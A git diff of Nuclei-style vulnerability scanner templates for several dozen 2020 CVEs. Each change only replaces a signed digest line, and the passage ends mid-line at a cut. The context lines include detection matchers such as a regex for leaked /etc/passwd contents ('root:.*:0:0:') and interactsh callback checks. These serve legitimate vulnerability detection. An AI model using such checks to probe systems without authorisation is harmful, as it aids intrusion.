a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index bf6c389ceb..58c2fa817a 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -108,4 +108,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 490a0046304402201f18aedbdadeb2cdc5f30ea26b1d4d98caab9e7ce93029b2fcf5d13b85b935e00220575847d9f812393e7c02727855728df354924f517696bf51d39c47e9a5fcf01b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220427ad9ce74b9b98b86407001fb43a5da7b733d081f770b10414a15c7de311cdd0220775ec548b3300873c5d4fc8f2c4a0bb13bc20bfb7c68eb96a6151b2db81cd576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 1f8af06135..82db8e072a 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c3492604fe6ffb150d983c57a55822a1ccaf9544c9acef5270afebceca826124022100bb7cead7683c1f14153ce2f193c2ae3534ffea422cc659852a30be1b6dca1726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008df5d306b692f479c282f2083719a27826386cc1ea87df097cdc394635ecf431022100e077d8ed92e4e8082b931fe8ba6a1becb962a6109ad48ea66c31d480d095f7cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 2c721a7b20..3171f266f3 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d428c575ce432ed99a51090d8663c82a58604fbcd255a72dbc8032aa665c4d18022100fe7fe775dda4c6526f5df535684f57b1456845031e1b23d41a6b3a5b4da29305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c213ff63f86f003a8a4909dfd59fe38797ca854897c1e98c0a4fc2508ca9e5c02201e97ba4c5a698a5c64c7963a3bd127cad5535f49e4175585505d94ab711f3d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index e2badfa1ba..b645ea800f 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022038504a32912735d1e070f9e8d7a17e38206b622b7dbc2246ed290d9c713625c5022055df1771eb09041fa2e67b1dc2cc61d43bb6f7d3a7ce0bb5143ee665ebe2785f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c776cfa8afcb78cf67be23059268feb0a4ce17e7c5f73b1f02c6be009b1054bd02202ec25012d5a48bcf4b66705a67e2b6d2fb16137d05d42d484c67a2d45ff53cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 559b32d018..87b9f9fc9a 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -81,4 +81,4 @@ http: part: body regex: - '(.*)' -# digest: 4a0a00473045022100933ccbbec69c077cf18a07ac71b7a7c533757dd74da93f9010e54cbaa4fbac4a022015131136b25176aa3e188cae6dc1fde89694980c36382c03a062806340676340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022038ae39ec17351cd61ce642932f11e58b2f3e12a42fd0f1fe0fd266290491c272022100e0af18a7f821b0f6f5ceedf3def017277a60c9a4d28b11236d80fb01a5132dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index a7aaf3bace..df61d8e6a6 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -50,4 +50,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 490a00463044022063e0e67a7bb4fe7ce6ba0af44196796b4cffdb8b70fff7af3985ed6ae9398aec02200602c7500ae30ab21eefcaec3c198f470eec8bf5829fd8b342cec48f61b38624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ef1bf0fea88bd539f12c331bea2f11764cd93640de4bdbe003d63a65fbdc959502203dea34446c64bb5114200f5d4ceb21b8ff6854b4ed104d1d8599dfc9bb394bf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 420a8e3da1..ee894e3684 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f2a44e67034e252b8eaa1368807b0901d4b68001bf88f9e753b0b564821c13680221008d7a817fa839ff050349d9cdaca9fcb3e0de721b3bb9561fa6113f630af30573:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030d321de32ef91175ed3610aeb15079bf2b38dcbedd8d1c220aba8a52460d95d02207a9b5f5678cf8bce8081d773d7faeebe27343d70a327288a414f22dfd377c98e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15050.yaml b/http/cves/2020/CVE-2020-15050.yaml index 97d7f3ddf6..61971ce5c0 100644 --- a/http/cves/2020/CVE-2020-15050.yaml +++ b/http/cves/2020/CVE-2020-15050.yaml @@ -41,4 +41,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022027582fd4cb0e0721dcad8ad6dedd262cd3be8b49cf72e43e17a2d9945178024a02205c1ba847b18c648f8f13e7cd4e6e20f76079e24b2801869c1f78c3d40cc310ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001ed81d67673bb1196354b1c038c49898eb5dc900e757af4a03d2b32b93a2652022077f57b76704ac576bdc798a28d68a359a5bf6beb8c31469f698e4a046ad5811f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index 00059c17ca..dd5ba3d4a3 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 302 -# digest: 4a0a00473045022100eb65852655cf2ffa9857b498f49d741adc084d90e7df1242789ac0a44d43bf34022050f270e7ab62c2fa8a2308cb4efc9e026e0d04f6c0a9874468caf17cd153bc1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fef0a412edf6b47472bee315ce5ffe74d531618ed66300fd18d9eea4347d85c022026695d3839f65a86fc05ee3c77c1d91961920304f61f16eeaba8db1cd49efe7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 1b846f0d28..f5c3b828c4 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -49,4 +49,4 @@ http: part: header words: - "Nette Framework" -# digest: 4b0a00483046022100d924020a64f0a7063c6caff4a9736f8c76224609cbd1e10c909d94708c8005040221008a11b53aa999e40c444bc485ce3818802a012f25a0c8f2345f5ee1724e189ccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205c1215ea8640da18e3d614f0c0ec279adead8c18fb2c0dc21706e5a6ba3ba54602207009aca8e84a8b3e0edf6bd9bb32648147ee3aa92da7fe7cb29dbd8272e00f0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 3f30f6d845..1019df5e1a 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -103,4 +103,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 490a004630440220634448bc6e6145d018c2163f8a8e5d51214177d2144ccd548e0a8e430cd8a25d022016d72ba966582440fa674d5a0949691d66338e0a04271f3beb6943515d06b2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d19b4304084cc6b071b54c10afcde5eba6a57ae96b711e27539d368d5ab91437022100d710877d2115203f1e1bff71a3db637617969a02871595a48423bfb41e2a44a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index efcc8a74b2..52bda57862 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b72b4c809ec1dc73432999836247ed8d875caed6507e71982ff18144ea3f71fc022100af1fb390a0cdb6ba909ee5a666baf036e93eb65594f434c7b42d44c91871c8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a15903b8905e5c2bbda65911656d71caf76c71a92d3f08188dc3c47716b5ae2602205b44e79eb89a695c7d552c04c0a5fef0ee0c0f75052ea411b375c5da75e7d0b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 4a99bb1cb2..fbd9a6c880 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207a5a0d923bbdf64ab39d269258ab52e2092c633b956aeab4d50dab3d8223317a02203e49feb954b4e04ac3ea988112f5d3375d50f6c4382b8bc8e3df588b7d18020e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f064308c71bbaf7bc3c99dea36759e0c0eed036791d04b10dc914b420510d6d02201b24a3ce44931cc68f49d0a5505134c832b6ad528bc868aab187187ac42bf185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index d7a10bf562..8012c96826 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -69,4 +69,4 @@ http: - "SLA Misses" - "Task Instances" condition: and -# digest: 4a0a0047304502206d68fd41280e585876cfdefb47cc7394176077ee82533c24194f21850e8f41b3022100cd360805a8b3738cc27c3e08d15f9642e5afa3da79ea8e1e4aabf655a92d615e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b675a007b96fc060c9eb89845b2a42c5827300d1ba989c0fb84395784fb232802206ebc39f21dbb1faa5da94238b9ee8ec1fead45c3442bc0aa147bf56811c62a30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index ffed4c673d..172a4331cc 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -49,4 +49,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4b0a00483046022100c95df7b80a699a5c469efd05763166e9336345788dcb921f4d7554984ab97434022100ab616a6d4e61409d715aaf95f946dc4cbdf01bcd1eee0e5b82da8de762627444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026d5cedcf92afb80482f9772cbc35b6f7420195016286da870f005bd38e68ee2022036be1e1d0b1467a4d8477cdadad217209055957a472d8b73e5cbd8d878679650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index 581b28113e..7ebe34cb3d 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec03ccaf8d59fb6b4355b6188f4cecad9817f38ce889c7ed6046257af6e24b38022100c88ef66de3fb9773d33608a6df27e242486e0571ebdc0fc6fea38832eeb9a01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f6c82731292777144a393c026e907ed4cd182b415569a155f01eec096801c61202201f5e281525d2a6448d090ef86860880af8b5bdd22e121adbe0c67cf6da2a7296:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-19295.yaml b/http/cves/2020/CVE-2020-19295.yaml index b230334678..4e70a2132a 100644 --- a/http/cves/2020/CVE-2020-19295.yaml +++ b/http/cves/2020/CVE-2020-19295.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206fdeafff21f7a7f3fa290875fb004823b70c6bc687ea55c42db457447b3d104d02203827511e17f0cc818dbe25c0d09eaa34562318a78faed6b679baeafbb76c61dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210080011e3426dd3ac9fd09671418d601e156c46235d5a728ee0d16fed158fa0c0a022100a8e57d581e69deae087590cb6cc322a80980b879c3c01483d124eb31ff11926a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 587a2e9d98..322a4ace68 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f656b6ff200968ecf88fc72175af181dd93db9241900173d0b1c44d111c3c6be022060232e6f5fd6e2e507ed3d05b22b6689f78fdf1c7e98b17bd9c7d25dd48732ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f659b7284f7cc1621c227e158eb100dcd708c9879f1d7a74ee0e11c97cb0b50002207bec0429a843052f078c86f9e59f992147c3b8457f235e8cc052ef770ce98625:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index b9d233d9a5..5ddb6ed76c 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100f32fac0aa8d548e9248b35103897d1472703d6a32bca8c446ba4f1fb9b59d6cb02200e8b61012f8840dda673f78b261f0647fd16af57384cb37b5e358a4c28d14a7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022037401e32ed8c0dd92782f4fb3c228c7f838b7b399725c3d2b1b957e42bdfd2eb022008e5adf97037cb9c6fdaa70c612fcbc2ef2647486b0477f3a19693123df2c392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index ef340cdee3..8706c750e3 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -58,4 +58,4 @@ http: - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '')" - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '')" condition: or -# digest: 4a0a00473045022100e0fdeee5368da1ac4520688c142084a0d8b734d3f3dc2364e07265293d3752e502201bd30580efd05d773cfc766effb15628ba4ec6272220898762fa420fe55846f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f2320b488f61a13773b38fda53d091c777b37782fc59264dbb45fd855c903ef202201b341e73fb8e91ea9c92b8c31dd3c443c614508274b55523c156624663278320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 06706fef71..b4b3515c91 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f46ffc582deb51e533a86dc1fc6d4d941398347583eb7e8ca02e4b13707992c8022100cfd1b655dcf1bb46c7ef45b0d838ad0a2bc161b977782941f0c13052a9b19971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015c292aef1c4d365fcd2e72f60afb74732eac38b7be0d6ca10bae5ef6101fd1d022100e47267d0c42e5e411682c1f3087612ff9b37a650327192fbe2c63681d4003ad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 2340a0a7a5..dee490a35a 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -68,4 +68,4 @@ http: - type: kval kval: - x_jenkins -# digest: 4a0a0047304502202354f112a56f1ae70a3b5ccd8ed37eb1c66ecde2c75ae067591bb47cda8120df022100d43276d553bfd311f13969af700bcae074ca90d9c3ec06fcc042833fdff09298:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d24b5dc4deb3568bbb102acd2788bacc29025d2cb2fe430fc80aa096bad77feb022100edd842cfb487981e9aa2881f3ce0171744605b8cb94638a35768ef3ef5c88985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-21224.yaml b/http/cves/2020/CVE-2020-21224.yaml index 2bcb4d3ba8..ddd4d46c75 100644 --- a/http/cves/2020/CVE-2020-21224.yaml +++ b/http/cves/2020/CVE-2020-21224.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022034c78c5214c182a891935aaea308b6e385207896bbf1e29aa5584b684156c624022100d8ce75817e295f76723a1f55b29e95769cea4ae6171cd1b4b162a8f2a7bd5cfa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100faceb48d56d39a5f46ad7ff231c1b74aa3f580ada1a184a14f6dbe8a4c228ec7022100a20ee393baa8cefc860c9e4727e08eb5406f41dc51766f32066017070ca41ca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index 6e9c6b5eb3..507c10fa14 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -44,4 +44,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a00473045022100a2f8e688066f0bf78b4ec30e42371cdcfbd6163f995127448631eb8c36f8da5f02201b8d6b4e4092a47507ca2b42459fcf3da8d0bc221c89e8c70b605abe10f18379:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d360add97dfb5a901ef84c443dd9348407cd194e04340c860a46a6dafb882e7d02206276a370772567e058cc176685f2997ed2049ecc5044ffd2ed05bb0678ad751c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 5e27ccca95..bd95a9dee7 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -46,4 +46,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a00473045022059525c62ce6e84a6139fb32be4e0ac407b3214a0a55d0c92455379d33a54676f022100845435da58a71d7dff6dc5ef5c2318d7d51e38ac98d2eb90a62aca375f4a526b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a4885192d95abc12e42d3a809fe11520c670cfc38874733dda4a94990e2dec802203059366eed7fd613e10a530a6e7d899979e4cde2c76c217a734b16edb209c6c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index d37dc4ff78..ebf90dddcb 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -44,4 +44,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a00473045022100936088574c536f79ad97ead1e884e8e6f07631923462c9e2816709d350c2219c02206ee0d19db59a932db37e1174fef33662049d86f69dbf60116cd52c7fbedeb0a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb716bdf0fc56e4251dbd67dfe2a86b3e92074cdb468cfbeb22d1e36a31ae60a022100cc6e9cbea1e2c559b6542e19b5f1efe07f73a572204cbfcf7b1bed815723f99d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index 6192c1df66..ba00a20c74 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -44,4 +44,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a004730450220526bec7134f0a7e30dc2c18d05cd0a15c7236eea798996f61b0a30b2f25679b7022100c0d2a8f60b929351c19fe62be4957ce929b27253d7af1d2a301e46949e00d646:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059138a41d825913376a32014ff074a357ef25a179e9f8ad93f73cad2758e69d1022100a3b0d46255be15c3a65a81d14c38fa7bcde6c195093c59d902740ae93b21a8fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-22840.yaml b/http/cves/2020/CVE-2020-22840.yaml index d33e424ccd..51916ab6f9 100644 --- a/http/cves/2020/CVE-2020-22840.yaml +++ b/http/cves/2020/CVE-2020-22840.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' -# digest: 4b0a00483046022100aca101d54608e4e381651f80543d9c794c8e167de5bccd3a26b0fc1482f400880221009b0b916ed079773a3de491811b7feec2d0605abf868ef138cadb557821e59d36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b30d9ca67b9129fe08636b989261a6c278b8ab5cf9a2c8eb04a3a3d56857c3a20220745791e751caae5acd5bacb90f2ec3febea3006e3623edab09aab830bdae470e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 9148e674de..935cdd9032 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202b879dfcedefeec8e77a0f23607f84fd9daf70f6481881e65fe17a2ef8267e1902201dacbd3ac31b08a3eb15d8242e03d93927d46b1f5c6037be98c80050ae678a47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220154df7868429b23b96e73af4e3eabceace22d921d859b41f9ca200509decb003022100ce2e68eccba5dea0c0077f4b1ccb54bfb3164f7add0893192dba06672e328afa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 5acfb6341c..73ab570b8d 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -56,4 +56,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402206438adc9577bc1983c31950c82e68017eb54d222a07044e640696033b2b55cec0220306848d8e0c13a7fa6d8aaffd80dc5af414a779526851ec95fe9325e7c6720a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008cd4ea6e499ce27cb61170fb04abcb2ba016cc25048d40d1fcd420d0526474fb02210084b6f6f85ad980320e5d237f00e77b65688a93352612bb80811dd782b0f4ffe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index 6e913d1e4a..edc1d83374 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fbd977612352f0dbc57fc3116dd0173e5956ea43743ff80cbff7b4741e2b7410022100aea4f9ac38a84e79ec13760d398472a7d7b2d5a7534700d083a56e89868373a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083d7057d15370b352641f459c4aba0c0bbbb742db9b500427e517b9dbe736ecd022100f129b96b705bf911abe516c75a5b2e87905feb030827710ed0e05eb19febbe5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index ae48d96c85..adcb43655d 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c73f9c7d042051620e75c32001daf5e2ff74b05bddc153e04181ff239e33ec3022100dc7cb39e3db47baf79e6dee1450892b325dafc661450aaa1cda60304a42ed88c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f25cfda30cdf04edb4a7b445b113e789d6e7d6f07ef773b1412e6c55dd044f98022100fe1eca17a0bcfed314ac2a84751ebabb6f80a1c13671b8ab0df26c7076c1115f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 9b60357e10..74706360e8 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207738b2066386fd459e0b9ac89d7d2e288a4e34648fb01f90ec71c0e21fa03ae50220175ca7faf47c6e694fd4e185116169a7ef825b5cef23676ab7b5d04d228a5bfc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022053b1f04a038f859140bc931fc6e309ac05a5b85c3604acbd0ff90e0d71affe01022100efe7ff3b1bf4f4de3c09220e122654c51e0a4579b94f83a4885006f9b825b6a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index f74ebef038..a70c641f2b 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dab9da2a59ed710339783e84dbbc12f3cc1adb05a029a643e3c3037fa79634da0221008573313bc71495d933a0ad06e73c00e9060d06fd606de84cea42bd1be3ce68b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ee023fa945b699ecdc6ba90836f36b49445db2b4758b9c54a75e2ba91cbc7f10220284a3ea3c5f28213d5d60d92d04e1f5d66e2aacc092e263a996836e3ff4c8c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index 3c7b78bb1c..3f4c0db695 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205f8386f0894e4a5ed95d7986f6cfe22d73d8063ee2647f707f665bdbc0f9b5c20220373711b803f101999dbe22a26091260e8aa0b2892867bbd121f8ed6978870310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207e50b3ed9b29a0f0d8605b097970e019fd2100d1d0e91bf8e365492902e9eebd022100d65f279db6a7c16f47e45df961647a5cef50a390314f103ec019198b745c9136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index f31f78c841..3fd5fc5370 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009728b39a66e9d6ccd54fd30251759972397ef95674ba421b6c0c222ae0c22775022100f01f50ac834da9c53218a08bead765f946e867beaa00534cd26bf9d29b7e74d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f409ab21ddff06ab69a7920325d0b3cc78dfdd5af155f47cd30aa624ab36abba02210086000cc7f01d28e6ae277b6741bcb4d2af8f883943314293b7216f8e7f4bc0de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 5e2b1528a0..062c659885 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 